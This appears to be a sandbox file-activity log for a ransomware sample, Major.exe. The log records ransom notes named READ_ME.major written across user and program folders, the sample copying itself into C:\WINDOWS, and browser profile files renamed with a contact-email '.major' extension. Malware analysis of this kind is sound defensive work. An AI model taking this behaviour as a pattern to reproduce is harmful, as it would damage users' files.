| Create | \Users\FD1HVy\Music\TvaUMz0SYA\TEd5f 7tCv2Rnpo.mp3 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Music\TvaUMz0SYA\sm C75.m4a | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Music\TvaUMz0SYA\P_DuKHawbVaBIgA0yO_.wav | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Music\TvaUMz0SYA\nEGElsDHscivQ4hTM.mp3 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Music\TvaUMz0SYA\iCmkNHSvSOJY_0-nfbFS.m4a | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Music\TvaUMz0SYA\-cDq5_.m4a | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Pictures\Camera Roll\desktop.ini | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Pictures\Saved Pictures\desktop.ini | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Videos\EolgHvXR\HgvmG\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Videos\EolgHvXR\R3eG_Mm3 6jiK2_eNq\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Videos\EolgHvXR\VEV_ mHUHdjk8n7UGN\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Videos\EolgHvXR\YqJBnk1IxCci\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Videos\EolgHvXR\_vYI7VgRJ5MJC.mp4 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Videos\EolgHvXR\zxDuBr.flv | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Videos\EolgHvXR\z1xnG6st5c64hrVyhgb8.flv | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Videos\EolgHvXR\xLetOkh7v.flv | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Videos\EolgHvXR\h qmV-L1GJRPpmE.mkv | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\Videos\EolgHvXR\-Q5CQU3xjGpYs.flv | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\resources\ux\EULA\EULA_zh-tw.htm | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\resources\ux\EULA\EULA_zh-hk.htm | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\resources\ux\EULA\EULA_zh-cn.htm | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\resources\ux\EULA\EULA_uk-ua.htm | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\resources\ux\EULA\EULA_tr-tr.htm | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\resources\ux\EULA\EULA_th-th.htm | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\resources\ux\EULA\EULA_sv-se.htm | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\resources\ux\EULA\EULA_sr-latn-cs.htm | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\resources\ux\EULA\EULA_sl-si.htm | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\resources\ux\EULA\EULA_sk-sk.htm | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\resources\ux\EULA\EULA_ru-ru.htm | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\resources\ux\EULA\EULA_ro-ro.htm | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\resources\ux\EULA\EULA_pt-pt.htm | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\resources\ux\EULA\EULA_pt-br.htm | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\resources\ux\EULA\EULA_pl-pl.htm | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\resources\ux\EULA\EULA_nl-nl.htm | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\resources\ux\EULA\EULA_nb-no.htm | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\resources\ux\EULA\EULA_lv-lv.htm | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\resources\ux\EULA\EULA_lt-lt.htm | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\resources\ux\EULA\EULA_ko-kr.htm | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\resources\ux\EULA\EULA_ja-jp.htm | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\resources\ux\EULA\EULA_it-it.htm | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\resources\ux\EULA\EULA_hu-hu.htm | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\resources\ux\EULA\EULA_hr-hr.htm | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\resources\ux\EULA\EULA_he-il.htm | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\resources\ux\EULA\EULA_fr-fr.htm | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\resources\ux\EULA\EULA_fr-ca.htm | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\resources\ux\EULA\EULA_fi-fi.htm | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\resources\ux\EULA\EULA_et-ee.htm | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\resources\ux\EULA\EULA_es-mx.htm | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\resources\ux\EULA\EULA_es-es.htm | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\resources\ux\EULA\EULA_en-us.htm | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\resources\ux\EULA\EULA_en-gb.htm | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\resources\ux\EULA\EULA_el-gr.htm | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\resources\ux\EULA\EULA_de-de.htm | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\resources\ux\EULA\EULA_da-dk.htm | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\resources\ux\EULA\EULA_cs-cz.htm | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\resources\ux\EULA\EULA_bg-bg.htm | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\resources\ux\EULA\EULA_ar-sa.htm | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\resources\ux\Microsoft.WinJS\css\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\resources\ux\Microsoft.WinJS\js\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\Oracle\Java\.oracle_jre_usage\17dfc292991c7c46.timestamp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\Oracle\Java\installcache_x64\baseimagefam8 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\Oracle\Java\javapath\javaws.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\Oracle\Java\javapath\javaw.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\Oracle\Java\javapath\java.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\Package Cache\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\packages\vcRuntimeMinimum_x86\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages\vcRuntimeAdditional_amd64\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\Package Cache\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\packages\vcRuntimeMinimum_x86\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\Package Cache\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\packages\vcRuntimeAdditional_x86\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\Package Cache\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\packages\vcRuntimeMinimum_amd64\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\Package Cache\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\packages\vcRuntimeAdditional_amd64\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\Package Cache\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\packages\vcRuntimeMinimum_amd64\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\Package Cache\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\packages\vcRuntimeAdditional_x86\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\Package Cache\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\packages\vcRuntimeMinimum_x86\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\packages\vcRuntimeMinimum_amd64\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\Package Cache\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\packages\vcRuntimeAdditional_amd64\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\Package Cache\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\packages\vcRuntimeAdditional_x86\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\AppData\Local\Adobe\Acrobat\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\AppData\Local\Adobe\AcroCef\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\AppData\Local\Adobe\Color\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\AppData\Local\CEF\User Data\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\AppData\Local\Comms\Unistore\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | \Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\profiles.ini | type = size, size_out = 122 |
|
1 | |
| Get Info | \Users\FD1HVy\AppData\Roaming\Skype\RootTools\roottools.conf | type = size, size_out = 76 |
|
1 | |
| Get Info | \Users\FD1HVy\AppData\Local\Google\Chrome\User Data\Local State | type = size, size_out = 74760 |
|
1 | |
| Get Info | \Users\FD1HVy\AppData\Local\Google\Chrome\User Data\First Run | type = size, size_out = 0 |
|
1 | |
| Get Info | \Users\FD1HVy\AppData\Local\Google\Chrome\User Data\CrashpadMetrics-active.pma | type = size, size_out = 1048576 |
|
1 | |
| Get Info | \Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Crash Reports\InstallTime20170824053622 | type = size, size_out = 10 |
|
1 | |
| Get Info | \Users\FD1HVy\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat | type = size, size_out = 40 |
|
1 | |
| Get Info | \Users\FD1HVy\AppData\Local\Google\Chrome\User Data\Crashpad\metadata | type = size, size_out = 0 |
|
1 | |
| Copy | C:\WINDOWS\Major.exe | source_filename = C:\Users\FD1HVy\Desktop\Major.exe |
|
1 | |
| Move | \588bce7c90097ed212\1042\eula.rtf.1506877342345.bmps@tutanota.com.major | source_filename = \588bce7c90097ed212\1042\eula.rtf, flags = MOVEFILE_WRITE_THROUGH |
|
1 | |
| Move | \Users\FD1HVy\AppData\Local\Google\Chrome\User Data\Local State.1506877342345.bmps@tutanota.com.major | source_filename = \Users\FD1HVy\AppData\Local\Google\Chrome\User Data\Local State, flags = MOVEFILE_WRITE_THROUGH |
|
1 | |
| Move | \Users\FD1HVy\AppData\Local\Google\Chrome\User Data\First Run.1506877342345.bmps@tutanota.com.major | source_filename = \Users\FD1HVy\AppData\Local\Google\Chrome\User Data\First Run, flags = MOVEFILE_WRITE_THROUGH |
|
1 | |
| Move | \Users\FD1HVy\AppData\Local\Google\Chrome\User Data\CrashpadMetrics-active.pma.1506877342345.bmps@tutanota.com.major | source_filename = \Users\FD1HVy\AppData\Local\Google\Chrome\User Data\CrashpadMetrics-active.pma, flags = MOVEFILE_WRITE_THROUGH |
|
1 | |
| Move | \Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\sessionstore.js.1506877342345.bmps@tutanota.com.major | source_filename = \Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\sessionstore.js, flags = MOVEFILE_WRITE_THROUGH |
|
1 | |
| Move | \Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\sessionCheckpoints.json.1506877342345.bmps@tutanota.com.major | source_filename = \Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\sessionCheckpoints.json, flags = MOVEFILE_WRITE_THROUGH |
|
1 | |
| Move | \Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\SecurityPreloadState.txt.1506877342345.bmps@tutanota.com.major | source_filename = \Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\SecurityPreloadState.txt, flags = MOVEFILE_WRITE_THROUGH |
|
1 | |
| Move | \Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\secmod.db.1506877342345.bmps@tutanota.com.major | source_filename = \Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\secmod.db, flags = MOVEFILE_WRITE_THROUGH |
|
1 | |
| Move | \Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\search.json.mozlz4.1506877342345.bmps@tutanota.com.major | source_filename = \Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\search.json.mozlz4, flags = MOVEFILE_WRITE_THROUGH |
|
1 | |
| Move | \Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\prefs.js.1506877342345.bmps@tutanota.com.major | source_filename = \Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\prefs.js, flags = MOVEFILE_WRITE_THROUGH |
|
1 | |
| Move | \Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\pluginreg.dat.1506877342345.bmps@tutanota.com.major | source_filename = \Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\pluginreg.dat, flags = MOVEFILE_WRITE_THROUGH |
|
1 | |
| Move | \Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\places.sqlite-wal.1506877342345.bmps@tutanota.com.major | source_filename = \Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\places.sqlite-wal, flags = MOVEFILE_WRITE_THROUGH |
|
1 | |
| Move | \Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\places.sqlite-shm.1506877342345.bmps@tutanota.com.major | source_filename = \Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\places.sqlite-shm, flags = MOVEFILE_WRITE_THROUGH |
|
1 | |
| Move | \Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\places.sqlite.1506877342345.bmps@tutanota.com.major | source_filename = \Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\places.sqlite, flags = MOVEFILE_WRITE_THROUGH |
|
1 | |
| Move | \Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\permissions.sqlite.1506877342345.bmps@tutanota.com.major | source_filename = \Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\permissions.sqlite, flags = MOVEFILE_WRITE_THROUGH |
|
1 | |
| Move | \Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\parent.lock.1506877342345.bmps@tutanota.com.major | source_filename = \Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\parent.lock, flags = MOVEFILE_WRITE_THROUGH |
|
1 | |
| Move | \Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\key3.db.1506877342345.bmps@tutanota.com.major | source_filename = \Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\key3.db, flags = MOVEFILE_WRITE_THROUGH |
|
1 | |
| Move | \Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\handlers.json.1506877342345.bmps@tutanota.com.major | source_filename = \Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\handlers.json, flags = MOVEFILE_WRITE_THROUGH |
|
1 | |
| Move | \Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\favicons.sqlite-wal.1506877342345.bmps@tutanota.com.major | source_filename = \Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\favicons.sqlite-wal, flags = MOVEFILE_WRITE_THROUGH |
|
1 | |
| Move | \Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\favicons.sqlite-shm.1506877342345.bmps@tutanota.com.major | source_filename = \Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\favicons.sqlite-shm, flags = MOVEFILE_WRITE_THROUGH |
|
1 | |
| Move | \Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\favicons.sqlite.1506877342345.bmps@tutanota.com.major | source_filename = \Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\favicons.sqlite, flags = MOVEFILE_WRITE_THROUGH |
|
1 | |
| Move | \Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\extensions.json.1506877342345.bmps@tutanota.com.major | source_filename = \Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\extensions.json, flags = MOVEFILE_WRITE_THROUGH |
|
1 | |
| Move | \Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\cookies.sqlite.1506877342345.bmps@tutanota.com.major | source_filename = \Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\cookies.sqlite, flags = MOVEFILE_WRITE_THROUGH |
|
1 | |
| Move | \Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\content-prefs.sqlite.1506877342345.bmps@tutanota.com.major | source_filename = \Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\content-prefs.sqlite, flags = MOVEFILE_WRITE_THROUGH |
|
1 | |
| Move | \Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\containers.json.1506877342345.bmps@tutanota.com.major | source_filename = \Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\containers.json, flags = MOVEFILE_WRITE_THROUGH |
|
1 | |
| Move | \Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\compatibility.ini.1506877342345.bmps@tutanota.com.major | source_filename = \Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\compatibility.ini, flags = MOVEFILE_WRITE_THROUGH |
|
1 | |
| Move | \Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\cert8.db.1506877342345.bmps@tutanota.com.major | source_filename = \Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\cert8.db, flags = MOVEFILE_WRITE_THROUGH |
|
1 | |
| Move | \Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\blocklist.xml.1506877342345.bmps@tutanota.com.major | source_filename = \Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\blocklist.xml, flags = MOVEFILE_WRITE_THROUGH |
|
1 | |
| Move | \Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\AlternateServices.txt.1506877342345.bmps@tutanota.com.major | source_filename = \Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\AlternateServices.txt, flags = MOVEFILE_WRITE_THROUGH |
|
1 | |
| Move | \Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\addonStartup.json.lz4.1506877342345.bmps@tutanota.com.major | source_filename = \Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\addonStartup.json.lz4, flags = MOVEFILE_WRITE_THROUGH |
|
1 | |
| Move | \Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\addons.json.1506877342345.bmps@tutanota.com.major | source_filename = \Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\addons.json, flags = MOVEFILE_WRITE_THROUGH |
|
1 | |
| Move | \Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\crashes\store.json.mozlz4.1506877342345.bmps@tutanota.com.major | source_filename = \Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\crashes\store.json.mozlz4, flags = MOVEFILE_WRITE_THROUGH |
|
1 | |
| Read | \Users\desktop.ini | size = 174, size_out = 174 |
|
1 | |
| Read | \$Recycle.Bin\S-1-5-18\desktop.ini | size = 129, size_out = 129 |
|
1 | |
| Read | \$Recycle.Bin\S-1-5-21-1051304884-625712362-2192934891-1000\desktop.ini | size = 129, size_out = 129 |
|
1 | |
| Read | \Users\Public\desktop.ini | size = 174, size_out = 174 |
|
1 | |
| Read | \Users\FD1HVy\Contacts\desktop.ini | size = 412, size_out = 412 |
|
1 | |
| Read | \Users\FD1HVy\Desktop\desktop.ini | size = 282, size_out = 282 |
|
1 | |
| Read | \Users\FD1HVy\Documents\desktop.ini | size = 402, size_out = 402 |
|
1 | |
| Read | \Users\FD1HVy\Downloads\desktop.ini | size = 282, size_out = 282 |
|
1 | |
| Read | \Users\FD1HVy\Favorites\desktop.ini | size = 402, size_out = 402 |
|
1 | |
| Read | \Users\FD1HVy\Links\desktop.ini | size = 504, size_out = 504 |
|
1 | |
| Read | \Users\FD1HVy\Music\desktop.ini | size = 504, size_out = 504 |
|
1 | |
| Read | \Users\FD1HVy\OneDrive\desktop.ini | size = 97, size_out = 97 |
|
1 | |
| Read | \Users\FD1HVy\Pictures\desktop.ini | size = 504, size_out = 504 |
|
1 | |
| Read | \Users\FD1HVy\Saved Games\desktop.ini | size = 282, size_out = 282 |
|
1 | |
| Read | \Users\FD1HVy\Searches\desktop.ini | size = 524, size_out = 524 |
|
1 | |
| Read | \Users\FD1HVy\Videos\desktop.ini | size = 504, size_out = 504 |
|
1 | |
| Read | \Users\Public\AccountPictures\desktop.ini | size = 196, size_out = 196 |
|
1 | |
| Read | \Users\Public\Desktop\desktop.ini | size = 174, size_out = 174 |
|
1 | |
| Read | \Users\Public\Documents\desktop.ini | size = 278, size_out = 278 |
|
1 | |
| Read | \Users\Public\Downloads\desktop.ini | size = 174, size_out = 174 |
|
1 | |
